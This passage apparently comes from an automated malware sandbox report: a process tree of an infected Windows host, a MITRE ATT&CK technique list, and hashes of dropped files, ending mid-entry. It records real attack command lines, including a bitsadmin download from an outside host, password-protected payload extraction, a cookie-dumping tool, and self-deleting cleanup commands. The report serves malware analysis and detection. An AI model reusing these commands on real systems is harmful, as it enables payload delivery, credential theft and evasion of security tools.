                                                                                          PID:2040
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd848D.tmp\tempfile.ps1"
                                                                                          8⤵
                                                                                            PID:1604
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd848D.tmp\tempfile.ps1"
                                                                                            8⤵
                                                                                            • Drops file in Program Files directory
                                                                                            PID:1516
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd848D.tmp\tempfile.ps1"
                                                                                            8⤵
                                                                                            • Checks for any installed AV software in registry
                                                                                            PID:2808
                                                                                          • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                            "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                            8⤵
                                                                                            • Download via BitsAdmin
                                                                                            PID:1912
                                                                                          • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                            "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pNFM5uOTEhcduVS4 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                            8⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:7604
                                                                                          • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                            "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pTu7FDc7mojSd2jD -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                            8⤵
                                                                                            • Executes dropped EXE
                                                                                            • Drops file in Program Files directory
                                                                                            PID:7648
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd848D.tmp\tempfile.ps1"
                                                                                            8⤵
                                                                                              PID:2296
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd848D.tmp\tempfile.ps1"
                                                                                              8⤵
                                                                                                PID:8152
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd848D.tmp\tempfile.ps1"
                                                                                                8⤵
                                                                                                  PID:7584
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd848D.tmp\tempfile.ps1"
                                                                                                  8⤵
                                                                                                    PID:7748
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd848D.tmp\tempfile.ps1"
                                                                                                    8⤵
                                                                                                      PID:1004
                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\IWrYHEyJ\IWrYHEyJ.dll" IWrYHEyJ
                                                                                                      8⤵
                                                                                                        PID:7916
                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\IWrYHEyJ\IWrYHEyJ.dll" IWrYHEyJ
                                                                                                          9⤵
                                                                                                          • Drops file in System32 directory
                                                                                                          PID:7816
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd848D.tmp\tempfile.ps1"
                                                                                                        8⤵
                                                                                                        • Drops file in Program Files directory
                                                                                                        PID:2128
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd848D.tmp\tempfile.ps1"
                                                                                                        8⤵
                                                                                                          PID:2080
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd848D.tmp\tempfile.ps1"
                                                                                                          8⤵
                                                                                                            PID:7828
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd848D.tmp\tempfile.ps1"
                                                                                                            8⤵
                                                                                                              PID:808
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd848D.tmp\tempfile.ps1"
                                                                                                              8⤵
                                                                                                                PID:8068
                                                                                                              • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                8⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:8128
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Modifies system certificate store
                                                                                                    PID:396
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe" >> NUL
                                                                                                      3⤵
                                                                                                        PID:2184
                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                          ping 127.0.0.1
                                                                                                          4⤵
                                                                                                          • Runs ping.exe
                                                                                                          PID:2228
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:2472
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      • Adds Run key to start application
                                                                                                      PID:1552
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:2144
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        PID:1732
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:8144
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:7804
                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe "831383430-18340895751162882387-211980488512409192372067947106-12572763752058774492"
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:2792
                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe "17703915081378831685260284396-2025446185790078660-1761981328-1463991518-1184237214"
                                                                                                    1⤵
                                                                                                    • Loads dropped DLL
                                                                                                    PID:2160
                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe "-2057365506-17137914571486135998866866708-1190072560-1341000850-417369452-1401478788"
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                    PID:2820
                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe "-12407841151313445714-1638555743-649418509-51388925333984241-1302140534563986755"
                                                                                                    1⤵
                                                                                                      PID:2212
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\8EE7.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\8EE7.exe
                                                                                                      1⤵
                                                                                                        PID:7632
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\979F.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\979F.exe
                                                                                                        1⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:7816
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\AA65.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\AA65.exe
                                                                                                        1⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        PID:7528
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c timeout 1
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                          PID:7632
                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                            timeout 1
                                                                                                            3⤵
                                                                                                            • Delays execution with timeout.exe
                                                                                                            PID:7672
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\AA65.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\AA65.exe"
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Checks processor information in registry
                                                                                                          • Modifies system certificate store
                                                                                                          PID:7804
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im AA65.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\AA65.exe" & del C:\ProgramData\*.dll & exit
                                                                                                            3⤵
                                                                                                              PID:7408
                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                taskkill /im AA65.exe /f
                                                                                                                4⤵
                                                                                                                • Kills process with taskkill
                                                                                                                PID:808
                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                timeout /t 6
                                                                                                                4⤵
                                                                                                                • Delays execution with timeout.exe
                                                                                                                PID:7392
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\AEAA.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\AEAA.exe
                                                                                                          1⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          PID:672
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\AEAA.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\AEAA.exe"
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:7560
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\B224.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\B224.exe
                                                                                                          1⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:7788
                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                          1⤵
                                                                                                            PID:7876
                                                                                                          • C:\Windows\explorer.exe
                                                                                                            C:\Windows\explorer.exe
                                                                                                            1⤵
                                                                                                              PID:7968
                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                              1⤵
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              PID:8156
                                                                                                            • C:\Windows\explorer.exe
                                                                                                              C:\Windows\explorer.exe
                                                                                                              1⤵
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              PID:4948
                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                              1⤵
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              PID:7384
                                                                                                            • C:\Windows\explorer.exe
                                                                                                              C:\Windows\explorer.exe
                                                                                                              1⤵
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              PID:7484
                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                              1⤵
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              PID:7508
                                                                                                            • C:\Windows\explorer.exe
                                                                                                              C:\Windows\explorer.exe
                                                                                                              1⤵
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              PID:7468
                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                              1⤵
                                                                                                                PID:2104

                                                                                                              Network

                                                                                                              MITRE ATT&CK Matrix ATT&CK v6

                                                                                                              Execution

                                                                                                              Scheduled Task

                                                                                                              1
                                                                                                              T1053

                                                                                                              Persistence

                                                                                                              Registry Run Keys / Startup Folder

                                                                                                              1
                                                                                                              T1060

                                                                                                              Scheduled Task

                                                                                                              1
                                                                                                              T1053

                                                                                                              BITS Jobs

                                                                                                              1
                                                                                                              T1197

                                                                                                              Privilege Escalation

                                                                                                              Scheduled Task

                                                                                                              1
                                                                                                              T1053

                                                                                                              Defense Evasion

                                                                                                              Disabling Security Tools

                                                                                                              2
                                                                                                              T1089

                                                                                                              Modify Registry

                                                                                                              5
                                                                                                              T1112

                                                                                                              BITS Jobs

                                                                                                              1
                                                                                                              T1197

                                                                                                              Install Root Certificate

                                                                                                              1
                                                                                                              T1130

                                                                                                              Credential Access

                                                                                                              Credentials in Files

                                                                                                              4
                                                                                                              T1081

                                                                                                              Discovery

                                                                                                              Software Discovery

                                                                                                              1
                                                                                                              T1518

                                                                                                              Security Software Discovery

                                                                                                              1
                                                                                                              T1063

                                                                                                              Query Registry

                                                                                                              4
                                                                                                              T1012

                                                                                                              System Information Discovery

                                                                                                              5
                                                                                                              T1082

                                                                                                              Peripheral Device Discovery

                                                                                                              2
                                                                                                              T1120

                                                                                                              Remote System Discovery

                                                                                                              1
                                                                                                              T1018

                                                                                                              Collection

                                                                                                              Data from Local System

                                                                                                              4
                                                                                                              T1005

                                                                                                              Command and Control

                                                                                                              Web Service

                                                                                                              1
                                                                                                              T1102

                                                                                                              Replay Monitor

                                                                                                              Loading Replay Monitor...

                                                                                                              Downloads

                                                                                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                MD5

                                                                                                                7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                SHA1

                                                                                                                804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                SHA256

                                                                                                                bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                SHA512

                                                                                                                49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                MD5

                                                                                                                7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                SHA1

                                                                                                                804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                SHA256

                                                                                                                bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                SHA512

                                                                                                                49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                              • C:\Program Files\Common Files\SDSVTFEAPM\ultramediaburner.exe
                                                                                                                MD5

                                                                                                                6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                SHA1

                                                                                                                938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                SHA256

                                                                                                                b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                SHA512

                                                                                                                a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                              • C:\Program Files\Common Files\SDSVTFEAPM\ultramediaburner.exe
                                                                                                                MD5

                                                                                                                6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                SHA1

                                                                                                                938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                SHA256

                                                                                                                b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                SHA512

                                                                                                                a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                              • C:\Program Files\install.dat
                                                                                                                MD5

                                                                                                                806c3221a013fec9530762750556c332

                                                                                                                SHA1

                                                                                                                36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                                SHA256

                                                                                                                9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                                SHA512

                                                                                                                56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                              • C:\Program Files\install.dll
                                                                                                                MD5

                                                                                                                fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                SHA1

                                                                                                                6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                SHA256

                                                                                                                9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                SHA512

                                                                                                                0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
                                                                                                                MD5

                                                                                                                15775d95513782f99cdfb17e65dfceb1

                                                                                                                SHA1

                                                                                                                6c11f8bee799b093f9ff4841e31041b081b23388

                                                                                                                SHA256

                                                                                                                477a9559194edf48848fce59e05105168745a46bdc0871ea742a2588ca9fbe00

                                                                                                                SHA512

                                                                                                                ac09ce01122d7a837bd70277badd58ff71d8c5335f8fc599d5e3ed42c8fee2108dd043bce562c82ba12a81b9b08bd24b961c0961bf8fd3a0b8341c87483cd1e7

                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                                MD5

                                                                                                                6d2e5b2bb19ad64dff7b6064c343ab71

                                                                                                                SHA1

                                                                                                                cd079156a3d6f6650060115566f1d5540a55e92e

                                                                                                                SHA256

                                                                                                                d35ca54d63d323446584ee3968fa63472ae40b87d1b38c07ea983f5441d498f2

                                                                                                                SHA512

                                                                                                                be94b5f53acac28d2bc3d4f80b6938de8d36a3d9ed9c9b9db1c35965868f8aaba21372176e5fe058da61bf9cfe8c2a533e75c105ee2a9b2086f6531d0b2bd2ad

                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                                MD5

                                                                                                                256de9a44ac015196a86aecf2485f9db

                                                                                                                SHA1

                                                                                                                c2f7522324f5fb2349d9598272bbe259cdc8c717

                                                                                                                SHA256

                                                                                                                9d678e02d92340cdd8fa76c8ad2944778b746329844020e540539ed353688aed

                                                                                                                SHA512

                                                                                                                ef1d881e42f1290f3fbef6cc3ff4ce261df5b4f1364f7529e40f192b5851c665234933d4ba41729ed7e4a7d039a8273247ebfcdb0e401a9e44713fd199d29006

                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                                MD5

                                                                                                                68f3641c72eed3cdb743a83d6a244109

                                                                                                                SHA1

                                                                                                                cf37789b818a9e8d792987069521227e030c02e8

                                                                                                                SHA256

                                                                                                                3c20e724db94c17e71f9ab06dc1e20215297406abdd6ae4f84f03e61fa868fda

                                                                                                                SHA512

                                                                                                                0191ef66728100c878d07e0717509d14a82d8987dbfe20677a2aad8fb5c7d384a482068b81e9b1e6e3b1a9222b4cc9d7714d9593bbe4ff6a052720f5185f7d91

                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                                MD5

                                                                                                                38a716034be15ed31938681448a3fa27

                                                                                                                SHA1

                                                                                                                268c46b3e2049773f0271b28389d9dc0bf273e3c

                                                                                                                SHA256

                                                                                                                3ada5daea22cf1343b16ad457519a7b5286562b5ad8d5a48205f63f0f251a4d0

                                                                                                                SHA512

                                                                                                                1d490790bef0e2c783776509c1c287f0597e4d4a79457a8def5d17bf80ca3cdccdc933d99128e193156bf9db52109c6746c5d670d7b5478cc5b6412efef1707d

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\4a-93923-5c1-04f87-3d07c5c3a3c94\SHodirifaja.exe
                                                                                                                MD5

                                                                                                                1f19330a59c0369f5d0b77b02f275568

                                                                                                                SHA1

                                                                                                                0958f885ff49c94e5b0ae11204db59f031c63fbc

                                                                                                                SHA256

                                                                                                                f2f52b25eee4a21ebe2763fb3b0925c3ab31a6ef53c884c007f221b1c288d6a1

                                                                                                                SHA512

                                                                                                                3123036eaa3ff849c140d79abe453999be02e1823f673c150a0544cef20af5a1db69d1de5f4add7ab85eea06c2fea9fc824c989e13b38c1a2d7455c3ff81eaf1

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\4a-93923-5c1-04f87-3d07c5c3a3c94\SHodirifaja.exe
                                                                                                                MD5

                                                                                                                1f19330a59c0369f5d0b77b02f275568

                                                                                                                SHA1

                                                                                                                0958f885ff49c94e5b0ae11204db59f031c63fbc

                                                                                                                SHA256

                                                                                                                f2f52b25eee4a21ebe2763fb3b0925c3ab31a6ef53c884c007f221b1c288d6a1

                                                                                                                SHA512

                                                                                                                3123036eaa3ff849c140d79abe453999be02e1823f673c150a0544cef20af5a1db69d1de5f4add7ab85eea06c2fea9fc824c989e13b38c1a2d7455c3ff81eaf1

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\4a-93923-5c1-04f87-3d07c5c3a3c94\SHodirifaja.exe.config
                                                                                                                MD5

                                                                                                                98d2687aec923f98c37f7cda8de0eb19

                                                                                                                SHA1

                                                                                                                f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                                SHA256

                                                                                                                8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                                SHA512

                                                                                                                95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                                MD5

                                                                                                                41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                                SHA1

                                                                                                                0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                                SHA256

                                                                                                                97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                                SHA512

                                                                                                                5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                                MD5

                                                                                                                41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                                SHA1

                                                                                                                0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                                SHA256

                                                                                                                97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                                SHA512

                                                                                                                5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                                MD5

                                                                                                                3b1b318df4d314a35dce9e8fd89e5121

                                                                                                                SHA1

                                                                                                                55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                                SHA256

                                                                                                                4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                                SHA512

                                                                                                                f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                                MD5

                                                                                                                3b1b318df4d314a35dce9e8fd89e5121

                                                                                                                SHA1

                                                                                                                55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                                SHA256

                                                                                                                4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                                SHA512

                                                                                                                f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\John_Ship.url
                                                                                                                MD5

                                                                                                                72825692a77bb94e1f69ef91bfbbff15

                                                                                                                SHA1

                                                                                                                db898f541f5e6e4305dfe469494d0ed1d4950395

                                                                                                                SHA256

                                                                                                                6e57ce08a3feecbb59a5b257660cc517793f1adb20b75d36a9d12f921fc826e7

                                                                                                                SHA512

                                                                                                                9a2c3ba9be966bb6f3ebf188578fa335a2583ce9c3ae94cbe3a044b02a339a9ca22b4a31e8c6076c720c8632fca6d1ebbc7a4575d0fe463cb4c526c187e333b8

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                                MD5

                                                                                                                3bc84c0e8831842f2ae263789217245d

                                                                                                                SHA1

                                                                                                                d60b174c7f8372036da1eb0a955200b1bb244387

                                                                                                                SHA256

                                                                                                                757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824

                                                                                                                SHA512

                                                                                                                f3117a6bd79db1d67dce2c67d539c56c177caed9f0b5b019dfb0034f28cb2e79e248893171c2ad78cbca358c2f5813edb17f0126ab40cfe08f9a6357f233f2e4

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                                MD5

                                                                                                                3bc84c0e8831842f2ae263789217245d

                                                                                                                SHA1

                                                                                                                d60b174c7f8372036da1eb0a955200b1bb244387

                                                                                                                SHA256

                                                                                                                757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824

                                                                                                                SHA512

                                                                                                                f3117a6bd79db1d67dce2c67d539c56c177caed9f0b5b019dfb0034f28cb2e79e248893171c2ad78cbca358c2f5813edb17f0126ab40cfe08f9a6357f233f2e4

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                                                                                                MD5

                                                                                                                e72eb3a565d7b5b83c7ff6fad519c6c9

                                                                                                                SHA1

                                                                                                                1a2668a26b01828eec1415aa614743abb0a4fb70

                                                                                                                SHA256

                                                                                                                8ff1e74643983f7ca9bca70f1bea562e805a86421defde1bd57fc0da3722f599

                                                                                                                SHA512

                                                                                                                71ae4db9c307c068f31a4e6471d950d1112d89d5661a4960dffbf6a7343cc313f98cfc35c5a10d38aae68be4b0a3f6a702fd5c28d938ca00094b26d0bcf03da3

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                                                                                                MD5

                                                                                                                e72eb3a565d7b5b83c7ff6fad519c6c9

                                                                                                                SHA1

                                                                                                                1a2668a26b01828eec1415aa614743abb0a4fb70

                                                                                                                SHA256

                                                                                                                8ff1e74643983f7ca9bca70f1bea562e805a86421defde1bd57fc0da3722f599

                                                                                                                SHA512

                                                                                                                71ae4db9c307c068f31a4e6471d950d1112d89d5661a4960dffbf6a7343cc313f98cfc35c5a10d38aae68be4b0a3f6a702fd5c28d938ca00094b26d0bcf03da3

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\e7-65443-37b-fe49e-8aed2e7bbcb17\ZHibitolugy.exe
                                                                                                                MD5

                                                                                                                c0cf9a2aa73be476329a8ffd03c17b19

                                                                                                                SHA1

